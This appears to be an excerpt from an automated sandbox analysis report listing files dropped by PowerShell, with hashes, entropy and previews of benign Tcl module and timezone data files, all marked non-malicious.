                                                                                                                                                                                                                              Preview:# -*- tcl -*-..#..# Searching for Tcl Modules. Defines a procedure, declares it as the primary..# command for finding packages, however also uses the former 'package unknown'..# command as a fallback...#..# Locates all possible packages in a directory via a less restricted glob. The..# targeted directory is derived from the name of the requested package, i.e...# the TM scan will look only at directories which can contain the requested..# package. It will register all packages it found in the directory so that..# future requests have a higher chance of being fulfilled by the ifneeded..# database without having to come to us again...#..# We do not remember where we have been and simply rescan targeted directories..# when invoked again. The reasoning is this:..#..# - The only way we get back to the same directory is if someone is trying to..# [package require] something that wasn't there on the first scan...#..# Either..# 1) It is there now: If we rescan, you get it; if not you don
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):147
                                                                                                                                                                                                                              Entropy (8bit):4.995501022397479
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/2DcsBdNMXGm2OHnFvpsYoHsdSalHFLwy:SlSWB9eg/2DBpDm2OHnFvmYoH1alHOy
                                                                                                                                                                                                                              MD5:FF8B5540631A6EE93507338C4E7AA49D
                                                                                                                                                                                                                              SHA1:817B261A1B6B92AA498EC286349964EA10FB5A84
                                                                                                                                                                                                                              SHA-256:7213997BB9CF9D384A7002B8C8EFEF25C01ABA6083D9835A16D583D5DCEE40A0
                                                                                                                                                                                                                              SHA-512:8D78AC4868ED0013EDA536C0E82E0E91398772AA18C637AEFE22F24B142FCDA55A4CB853B2282951E907C9E2F62BD3F831A5CF995F52898F5225D16889943A9C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Abidjan) {.. {-9223372036854775808 -968 0 LMT}.. {-1830383032 0 0 GMT}..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):183
                                                                                                                                                                                                                              Entropy (8bit):4.832432925672155
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqss1kovXHAIgNGE4pHRL/2Dc9XfBQDcsS:SlSWB9vsM3y7s3HAIgNT4pHN/2DUGDBS
                                                                                                                                                                                                                              MD5:52FDFD3DB98475FBBB620D0D5565C5CC
                                                                                                                                                                                                                              SHA1:C7750452859663605272553DBEE0B6C134E1517C
                                                                                                                                                                                                                              SHA-256:6040827AFED8CEF45F252FBD7E3E862C0B5E9D06C1C98C58BAD61DFE67BD57CC
                                                                                                                                                                                                                              SHA-512:2FF9D96D81279148A86BE208FEEACCBCB8B4224D093D6C092ECD1C4EA2186589CCF947027D3A726600C703611B4CFEE029AA14ED3E8593C477B427C4F342CF27
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Abidjan)]} {.. LoadTimeZoneFile Africa/Abidjan..}..set TZData(:Africa/Accra) $TZData(:Africa/Abidjan)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):189
                                                                                                                                                                                                                              Entropy (8bit):4.817170256300069
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsVVMMvfXHAIgNGExVMeWARL/2DczqIVDcVVMMyn:SlSWB9vsM3y7VTHAIgNTxcAN/2DnaDkO
                                                                                                                                                                                                                              MD5:30CDD4D37E9DD60FBF6D754C9343F364
                                                                                                                                                                                                                              SHA1:56F896C21068764B7B8F884F374B18913CA3D9CA
                                                                                                                                                                                                                              SHA-256:E11FD8AD8572B684333810CFDC23B92E1ACF619875866985E288D92F8277D07F
                                                                                                                                                                                                                              SHA-512:78FC8043CCE25713404E70996229E5EA8238BF5C0F59029064EDA5494E2D4F54398931F3D855E30C82B2C53B789C40EE4CBF09D0F98C2BA6734595D4AA75017A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Nairobi)]} {.. LoadTimeZoneFile Africa/Nairobi..}..set TZData(:Africa/Addis_Ababa) $TZData(:Africa/Nairobi)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1080
                                                                                                                                                                                                                              Entropy (8bit):4.187497782275587
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:MB862D7nmdHh5Cv6/lHY8SOSuvvzXipFSgSO5vW5aKmvbsF6VWsXN87QBWcAFy:5veSvKlHYXNujXipFSjKRKXiWsXCGWJy
                                                                                                                                                                                                                              MD5:E8D3DF11CE0E7575485573FA07D955D5
                                                                                                                                                                                                                              SHA1:3B2C00C85B6C0BFAA1C676C970D6DF1B4BDC3D4A
                                                                                                                                                                                                                              SHA-256:E6874647561CE1C5FD1F650C9B167F77AC5B24FD2026046399A9043CF998E5C4
                                                                                                                                                                                                                              SHA-512:E2968BE847622CF243C0E498436FD21BDC2E1DF0FD8D694F2C70569D17CE896CDE4968BB8ABDEF9F687439E4EA2D955AE87D6C15E81F881EE1413416A90765D4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Algiers) {.. {-9223372036854775808 732 0 LMT}.. {-2486592732 561 0 PMT}.. {-1855958961 0 0 WET}.. {-1689814800 3600 1 WEST}.. {-1680397200 0 0 WET}.. {-1665363600 3600 1 WEST}.. {-1648342800 0 0 WET}.. {-1635123600 3600 1 WEST}.. {-1616893200 0 0 WET}.. {-1604278800 3600 1 WEST}.. {-1585443600 0 0 WET}.. {-1574038800 3600 1 WEST}.. {-1552266000 0 0 WET}.. {-1539997200 3600 1 WEST}.. {-1531443600 0 0 WET}.. {-956365200 3600 1 WEST}.. {-950486400 0 0 WET}.. {-942012000 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-796262400 3600 0 CET}.. {-781052400 7200 1 CEST}.. {-766630800 3600 0 CET}.. {-733280400 0 0 WET}.. {-439430400 3600 0 CET}.. {-212029200 0 0 WET}.. {41468400 3600 1 WEST}.. {54774000 0 0 WET}.. {231724800 3600 1 WEST}.. {246240000 3600 0 CET}.. {259545600 7200 1 CEST}.. {275274000 3600 0 CET}.. {309740400 0 0 WET}.. {
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):184
                                                                                                                                                                                                                              Entropy (8bit):4.801054282631739
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsVVMMvfXHAIgNGExVMeWARL/2DcjEUEH+DcVVMMyn:SlSWB9vsM3y7VTHAIgNTxcAN/2DGs+DR
                                                                                                                                                                                                                              MD5:A543BDEB3771017421FB75231F0004F2
                                                                                                                                                                                                                              SHA1:D682C58C27562FF3ABAB8EDE8EB6EA754DA7C02E
                                                                                                                                                                                                                              SHA-256:064EB7F9A1FA05A317C6BDCA6B102BC1560D980758F9E4DDB010C9E7DC068ECB
                                                                                                                                                                                                                              SHA-512:44848D60EDC79AF784A819714C0D9F62DCCB6329B47F25D74AB8C174BF9EC3F783C66FEB27F588A93FABA9BECAF076F453D6D797CE4F28461F7AE69440EA54C7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Nairobi)]} {.. LoadTimeZoneFile Africa/Nairobi..}..set TZData(:Africa/Asmara) $TZData(:Africa/Nairobi)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):184
                                                                                                                                                                                                                              Entropy (8bit):4.806258322241929
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsVVMMvfXHAIgNGExVMeWARL/2DcjAWDcVVMMyn:SlSWB9vsM3y7VTHAIgNTxcAN/2D8DkOn
                                                                                                                                                                                                                              MD5:1B5E386E7A2F10D9385DE4C5683EBB85
                                                                                                                                                                                                                              SHA1:FECBA599C37493D2E0AEE8E21BAB40BF8E8DC82A
                                                                                                                                                                                                                              SHA-256:76939852A98EA7BF156D0AC18B434CC610DAF5232322C0FBB066CD52C5B72AF7
                                                                                                                                                                                                                              SHA-512:B36FABFCDB2187A3A4A211C8E033D96C91E3C4D47907D284E10786555562C82231566033EAB4753EF1E48DF1233CFC8C6C0FB3CA50748BE0B2554A972A88FBA0
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Nairobi)]} {.. LoadTimeZoneFile Africa/Nairobi..}..set TZData(:Africa/Asmera) $TZData(:Africa/Nairobi)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):184
                                                                                                                                                                                                                              Entropy (8bit):4.883634030944169
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqss1kovXHAIgNGE4pHRL/2DcxAQDcsS:SlSWB9vsM3y7s3HAIgNT4pHN/2DwNDBS
                                                                                                                                                                                                                              MD5:6B9BB5B37C41AA727E31BF03483DC1CA
                                                                                                                                                                                                                              SHA1:CB3BBA37B063EA4A54CD15C6E30C14D8CA30D3C0
                                                                                                                                                                                                                              SHA-256:F6D1BA22115A6565B6D6ABEB578F001DDB41E673C422C8EA70D0DF77B24115F6
                                                                                                                                                                                                                              SHA-512:23DB3E298FDEB165FD85D99E03C00835B584984B814AF7F54A9CDD4A9F93E16B0C58342D319129F46CF8EC36F93DE5EA51B492CA4CABDAB75D84709BC6C26119
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Abidjan)]} {.. LoadTimeZoneFile Africa/Abidjan..}..set TZData(:Africa/Bamako) $TZData(:Africa/Abidjan)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):178
                                                                                                                                                                                                                              Entropy (8bit):4.882974805254803
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsGe/vXHAIgNGESuvHRL/2Dcx2m/2DcGeyn:SlSWB9vsM3y7VXHAIgNTTN/2Dw/2D4yn
                                                                                                                                                                                                                              MD5:92FF9E5835C0C80F358BFE69120660A0
                                                                                                                                                                                                                              SHA1:724758B43BD79DD8A29B02BE6910D492924F8280
                                                                                                                                                                                                                              SHA-256:5047A507D22B68C9349EB6A48C41C80DB4C69F98F99C6574059DEA87178E36C0
                                                                                                                                                                                                                              SHA-512:6FCB709DB4AC19191FECE1E8BAC55E77F265B5AF89F7A3565F06BFAF0BEE12E3EAF2F52CA09C68D75C358C25A31867505CE8AD75D7386DCD15F4BE1CE61272CD
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Lagos)]} {.. LoadTimeZoneFile Africa/Lagos..}..set TZData(:Africa/Bangui) $TZData(:Africa/Lagos)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):184
                                                                                                                                                                                                                              Entropy (8bit):4.888193386512119
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqss1kovXHAIgNGE4pHRL/2Dcx79FHp4DcsS:SlSWB9vsM3y7s3HAIgNT4pHN/2Dw7J4c
                                                                                                                                                                                                                              MD5:46E5703CF284E44E15E5872DF075FCBC
                                                                                                                                                                                                                              SHA1:EA4BFA6D568DFA877F72302ADA21ECC2840D9FD5
                                                                                                                                                                                                                              SHA-256:77E610A02CCECE3045B09D07A9BE6100F5AA9C3C2AEB543535C9AE941194F4E4
                                                                                                                                                                                                                              SHA-512:1454467FE63E97DFA4DE66E359F68B2D80C92CDE59FC15A4BE513629FFD154D2281EADF3FC78F7AFDDF5A5896195F3A69E66697A659BBB1A0EAFD3E1DA6565EC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Abidjan)]} {.. LoadTimeZoneFile Africa/Abidjan..}..set TZData(:Africa/Banjul) $TZData(:Africa/Abidjan)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):176
                                                                                                                                                                                                                              Entropy (8bit):4.847843768169462
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/2Dc5iDMXGm2OHGVkeoHsdSawwF6hSVPVFwy:SlSWB9eg/2D4uDm2OHCkeoH1awwFMmMy
                                                                                                                                                                                                                              MD5:7E710C939B9CC0C1AC1ECF4239B543C5
                                                                                                                                                                                                                              SHA1:429CC87086FB22727815ED05AC6472333FF06013
                                                                                                                                                                                                                              SHA-256:2A870E534DE67713C27F2F3B9BF26FA7498C240CF633988CE76DBDAC5B69214D
                                                                                                                                                                                                                              SHA-512:70D9365C31C43A95211FC20E9290B24D356FFEFA935B8829CE32831026A196DECDD12226097F6DA3B4B919E137AA0181714680CDBB72B00C130A87E3A4735004
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Bissau) {.. {-9223372036854775808 -3740 0 LMT}.. {-1830380400 -3600 0 -01}.. {157770000 0 0 GMT}..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):183
                                                                                                                                                                                                                              Entropy (8bit):4.904342145830274
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsfKG5XHAIgNGEjKORL/2Dc8ycXp75h4DcfKB:SlSWB9vsM3y7fnHAIgNTjdN/2DAmp1hs
                                                                                                                                                                                                                              MD5:7AD3749D7047855CB9B9EC9696015402
                                                                                                                                                                                                                              SHA1:F792359AD9EEC2ABD98DAFA6661C1E57BAB89EBE
                                                                                                                                                                                                                              SHA-256:8F700409B8EEE33ACE5F050414971FFEE0270949842E58E9299BB5CD6CCF34DE
                                                                                                                                                                                                                              SHA-512:681C1B318746C587DEBA6E109D1D5A99D1F3E28FE46C24F36B69D533D884FDDC6EA35BB31A475575D683B73BF129FED761523EC9285F2FF1E4CACA2C54C046C5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Maputo)]} {.. LoadTimeZoneFile Africa/Maputo..}..set TZData(:Africa/Blantyre) $TZData(:Africa/Maputo)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):183
                                                                                                                                                                                                                              Entropy (8bit):4.901235831565769
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsGe/vXHAIgNGESuvHRL/2DciE0TMJZp4DcGeyn:SlSWB9vsM3y7VXHAIgNTTN/2D4qGp4D1
                                                                                                                                                                                                                              MD5:7028268EE88250AC40547A3FDBBFC67C
                                                                                                                                                                                                                              SHA1:5006D499CD1D1CB93EB3DA0EC279F76B7123DAA6
                                                                                                                                                                                                                              SHA-256:596DB2D64CDD6250642CB65514D5BCB52F3E3EA83F50D8915D9D4FDEA008F440
                                                                                                                                                                                                                              SHA-512:D623C69FE8A6050E77FB819C2F5FAEE35D5034182B1D30A409C17208155501656133E774E402875537335F8201E4734A0B5D327712CBF623AC330F1014D9025B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Lagos)]} {.. LoadTimeZoneFile Africa/Lagos..}..set TZData(:Africa/Brazzaville) $TZData(:Africa/Lagos)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):184
                                                                                                                                                                                                                              Entropy (8bit):4.947752840781864
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsfKG5XHAIgNGEjKORL/2DclbDcfKB:SlSWB9vsM3y7fnHAIgNTjdN/2DkbDEi
                                                                                                                                                                                                                              MD5:0EBC2D8F0BD1A32C21070F9397EAC9E2
                                                                                                                                                                                                                              SHA1:95AAA97427265635784E8AC624CA863DB9F1475D
                                                                                                                                                                                                                              SHA-256:9A15867255B43A954CA60DA11660F157553AAB6A15C50ACD49D182276E0CF4CC
                                                                                                                                                                                                                              SHA-512:4CD2E14F84C58E955742637A51D99DB9493972671A2B5D801EBD9D901D4903654E374C59BF010C70071D33FA17788358F78004201A787CCA2AD714D670393488
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Maputo)]} {.. LoadTimeZoneFile Africa/Maputo..}..set TZData(:Africa/Bujumbura) $TZData(:Africa/Maputo)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3852
                                                                                                                                                                                                                              Entropy (8bit):3.7766651198444507
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:58ybRwEa40MF4pt0/jaGYbaJF0a3T07ITB85oWXmSGmuyTVuV0apRQnL0KD3rZza:fLg1GbJFp3gHRQVy7DPUUQkiHMo
                                                                                                                                                                                                                              MD5:9DCDB3DD41DA13D81EB8E1CAF56964DA
                                                                                                                                                                                                                              SHA1:F95EE7B1EF464F2640EC4AE29F3C18B5BF2B2905
                                                                                                                                                                                                                              SHA-256:8698B0A53D858AEA7C495EDF759EF0E6C63F7E07A256599393DEC7B7A7413734
                                                                                                                                                                                                                              SHA-512:BA5898ABEE541BC72C9DEDD77BABB18024C7AEA0274FA3F809748FCBFF770BFAD902BF70680DDE989F7D3592E5398C100D0E0EA388D4200911ED7DE089535D6D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Cairo) {.. {-9223372036854775808 7509 0 LMT}.. {-2185409109 7200 0 EET}.. {-929844000 10800 1 EEST}.. {-923108400 7200 0 EET}.. {-906170400 10800 1 EEST}.. {-892868400 7200 0 EET}.. {-875844000 10800 1 EEST}.. {-857790000 7200 0 EET}.. {-844308000 10800 1 EEST}.. {-825822000 7200 0 EET}.. {-812685600 10800 1 EEST}.. {-794199600 7200 0 EET}.. {-779853600 10800 1 EEST}.. {-762663600 7200 0 EET}.. {-399088800 10800 1 EEST}.. {-386650800 7200 0 EET}.. {-368330400 10800 1 EEST}.. {-355114800 7200 0 EET}.. {-336790800 10800 1 EEST}.. {-323654400 7200 0 EET}.. {-305168400 10800 1 EEST}.. {-292032000 7200 0 EET}.. {-273632400 10800 1 EEST}.. {-260496000 7200 0 EET}.. {-242096400 10800 1 EEST}.. {-228960000 7200 0 EET}.. {-210560400 10800 1 EEST}.. {-197424000 7200 0 EET}.. {-178938000 10800 1 EEST}.. {-165801600 7200 0 EET}.. {-147402000
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5532
                                                                                                                                                                                                                              Entropy (8bit):3.535398586134154
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:zE+CJZtmaG6/eszBrlxs5MRhk9xPmwv7KbGKCDp0d:7MZSszBrlKcJC9k
                                                                                                                                                                                                                              MD5:18183122D242E0B69A80BC02BC0328DF
                                                                                                                                                                                                                              SHA1:C9976ABC0663EB29A2FEAAFDF6746C05A264B67C
                                                                                                                                                                                                                              SHA-256:8776EEDFDFEE09C4C833593127CEFAC9C33E2487AB9BF4BF8C73E5E11B4E5613
                                                                                                                                                                                                                              SHA-512:9611A6EF9C5B55FAB752C1EC7E464B8AF60AE32383CE9BA72F35168ABB68A45DB0654A9099CBDC123F5F6E2B6DB7C8FBF56A8DDB813824187AD1090971F12219
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Casablanca) {.. {-9223372036854775808 -1820 0 LMT}.. {-1773012580 0 0 +00}.. {-956361600 3600 1 +00}.. {-950490000 0 0 +00}.. {-942019200 3600 1 +00}.. {-761187600 0 0 +00}.. {-617241600 3600 1 +00}.. {-605149200 0 0 +00}.. {-81432000 3600 1 +00}.. {-71110800 0 0 +00}.. {141264000 3600 1 +00}.. {147222000 0 0 +00}.. {199756800 3600 1 +00}.. {207702000 0 0 +00}.. {231292800 3600 1 +00}.. {244249200 0 0 +00}.. {265507200 3600 1 +00}.. {271033200 0 0 +00}.. {448243200 3600 0 +01}.. {504918000 0 0 +00}.. {1212278400 3600 1 +00}.. {1220223600 0 0 +00}.. {1243814400 3600 1 +00}.. {1250809200 0 0 +00}.. {1272758400 3600 1 +00}.. {1281222000 0 0 +00}.. {1301788800 3600 1 +00}.. {1312066800 0 0 +00}.. {1335664800 3600 1 +00}.. {1342749600 0 0 +00}.. {1345428000 3600 1 +00}.. {1348970400 0 0 +00}.. {1367114400 3600 1 +00}.. {13731
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7536
                                                                                                                                                                                                                              Entropy (8bit):3.8315604186920704
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:TzLdXKy9f4elPiIEtzsFpMbFNBwA3ybuNTjrjBDmE0DmiTcoYdNOMCsyZhltlUxo:TdayR41sFpM5vwA6Efv03TBZLl
                                                                                                                                                                                                                              MD5:30155093248C4F7E45EF7C0132D2B2AB
                                                                                                                                                                                                                              SHA1:FAD100CC49F0CB0910BDE39B43295A47512E1BE6
                                                                                                                                                                                                                              SHA-256:8827F7311EDE69A9679BDF2B7418DBF350A2FC8F973E8B1E1E4390D4D5C6D2E8
                                                                                                                                                                                                                              SHA-512:469A24AF0C2A4A40CB2488C3E21BB9BBDE057F876EACA08A31FC6F22845063D917A0A4AE96680401E45792DE534EE3A305F137A93C4DF879B4602510D881270E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Ceuta) {.. {-9223372036854775808 -1276 0 LMT}.. {-2177452800 0 0 WET}.. {-1630112400 3600 1 WEST}.. {-1616810400 0 0 WET}.. {-1451692800 0 0 WET}.. {-1442451600 3600 1 WEST}.. {-1427673600 0 0 WET}.. {-1379293200 3600 1 WEST}.. {-1364774400 0 0 WET}.. {-1348448400 3600 1 WEST}.. {-1333324800 0 0 WET}.. {-1316390400 3600 1 WEST}.. {-1301270400 0 0 WET}.. {-1293840000 0 0 WET}.. {-94694400 0 0 WET}.. {-81432000 3600 1 WEST}.. {-71110800 0 0 WET}.. {141264000 3600 1 WEST}.. {147222000 0 0 WET}.. {199756800 3600 1 WEST}.. {207702000 0 0 WET}.. {231292800 3600 1 WEST}.. {244249200 0 0 WET}.. {265507200 3600 1 WEST}.. {271033200 0 0 WET}.. {448243200 3600 0 CET}.. {504918000 3600 0 CET}.. {512528400 7200 1 CEST}.. {528253200 3600 0 CET}.. {543978000 7200 1 CEST}.. {559702800 3600 0 CET}.. {575427600 7200 1 CEST}.. {591152400 3600
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):185
                                                                                                                                                                                                                              Entropy (8bit):4.88110192592456
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqss1kovXHAIgNGE4pHRL/2DcmMM1+DcsS:SlSWB9vsM3y7s3HAIgNT4pHN/2DCM1+c
                                                                                                                                                                                                                              MD5:8CDD2EEB7E0EC816F3EC051350FEBF13
                                                                                                                                                                                                                              SHA1:37F3A149B4A01DFA2EAB42A28C810BE66AAB7C52
                                                                                                                                                                                                                              SHA-256:3176C99FC45337CBCE0CD516DE4B02B8BAA47D00E84F698122A2ADD57797984E
                                                                                                                                                                                                                              SHA-512:5A90B6DB45EDAD7734D596FB81FD1959A433F57E71D2212E1DCBD6A12F3FD1FE747FA363C4C787A4D3023F542553C1E2C9CF4F61E28F1BB13042E4AFE3D0FF31
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Abidjan)]} {.. LoadTimeZoneFile Africa/Abidjan..}..set TZData(:Africa/Conakry) $TZData(:Africa/Abidjan)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):183
                                                                                                                                                                                                                              Entropy (8bit):4.856992353568779
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqss1kovXHAIgNGE4pHRL/2DcXXMFBx/2DcsS:SlSWB9vsM3y7s3HAIgNT4pHN/2DKXEBn
                                                                                                                                                                                                                              MD5:946D3B52F915445DBB8EE8BF67F4EFAB
                                                                                                                                                                                                                              SHA1:18345968B95E886CA72634D49F2B38F9B29BA629
                                                                                                                                                                                                                              SHA-256:D50F9732757B284BAC75526F2CFA585DF7F6974160827AFB0FF66124C7CFD361
                                                                                                                                                                                                                              SHA-512:00B531D1352CF35045EE25C777C7FEA17294E9861E68CE2DE0D9884C05EBDEA84D5F4F0E8B5605721295E25C259979446B7DB76525A633C7D2FA35B38962CF43
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Abidjan)]} {.. LoadTimeZoneFile Africa/Abidjan..}..set TZData(:Africa/Dakar) $TZData(:Africa/Abidjan)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):191
                                                                                                                                                                                                                              Entropy (8bit):4.8447607449193075
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsVVMMvfXHAIgNGExVMeWARL/2Dc8bEH+DcVVMMyn:SlSWB9vsM3y7VTHAIgNTxcAN/2DJbVDR
                                                                                                                                                                                                                              MD5:7A819572758BC60F4085DF28F1DD1C01
                                                                                                                                                                                                                              SHA1:0A5BA34EBFBA5A8E8B896713BA527781FC90FF01
